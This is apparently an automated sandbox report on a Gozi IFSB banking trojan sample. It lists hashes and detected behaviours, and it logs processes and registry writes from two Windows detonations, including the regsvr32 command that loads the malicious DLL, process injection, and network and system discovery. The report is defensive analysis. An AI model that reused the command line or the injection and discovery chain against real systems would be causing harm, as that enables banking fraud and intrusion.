Malware Analysis Report

2024-10-19 01:08

Sample ID 220809-pnx1tsaccl
Target f9d778ad3bfea174401f36a2d88851d8
SHA256 44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5

Threat Level: Known bad

The file f9d778ad3bfea174401f36a2d88851d8 was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Suspicious behavior: MapViewOfSection

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Discovers systems in the same network

Suspicious use of WriteProcessMemory

Gathers system information

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-09 12:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-09 12:29

Reported

2022-08-09 12:31

Platform

win7-20220715-en

Max time kernel

48s

Max time network

45s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1932 wrote to memory of 1832 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

Network

N/A

Files

memory/1932-54-0x000007FEFC381000-0x000007FEFC383000-memory.dmp

memory/1832-55-0x0000000000000000-mapping.dmp

memory/1832-56-0x0000000076281000-0x0000000076283000-memory.dmp

memory/1832-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1832-63-0x0000000000260000-0x000000000026D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-09 12:29

Reported

2022-08-09 12:31

Platform

win10v2004-20220722-en

Max time kernel

151s

Max time network

154s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1520 set thread context of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1716 set thread context of 4028 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\control.exe
PID 1028 set thread context of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 set thread context of 3784 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 set thread context of 4816 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 set thread context of 3256 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 4244 N/A C:\Windows\system32\control.exe C:\Windows\system32\rundll32.exe
PID 1028 set thread context of 3240 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c405d5b7-d2cb-4889-97 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = ca73dba6fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a68136a6fcabd8018c087ea6fcabd8018c087ea6fcabd80108e61a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000346537393864666536353764613932633663376338666661643535336130626636326261363637376430313930656266336165373161616132333037386635370000b20009000400efbe0955e0730955e0732e00000000000000000000000000000000000000000000000000d83e0400340065003700390038006400660065003600350037006400610039003200630036006300370063003800660066006100640035003500330061003000620066003600320062006100360036003700370064003000310039003000650062006600330061006500370031006100610061003200330030003700380066003500370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34653739386466653635376461393263366337633866666164353533613062663632626136363737643031393065626633616537316161613233303738663537000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff9485462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff9485462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\167bd767-e11a-4694-9b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = 12003ba5fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = b8354ba5fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = 8c8355a7fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000282b3ca5fcabd801282b3ca5fcabd801282b3ca5fcabd801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000346537393864666536353764613932633663376338666661643535336130626636326261363637376430313930656266336165373161616132333037386635370000b20009000400efbe0955e0730955e0732e00000000000000000000000000000000000000000000000000d83e0400340065003700390038006400660065003600350037006400610039003200630036006300370063003800660066006100640035003500330061003000620066003600320062006100360036003700370064003000310039003000650062006600330061006500370031006100610061003200330030003700380066003500370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34653739386466653635376461393263366337633866666164353533613062663632626136363737643031393065626633616537316161613233303738663537000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff8c85462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff8c85462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0065f893-8090-49d4-8d C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" C:\Windows\System32\RuntimeBroker.exe N/A
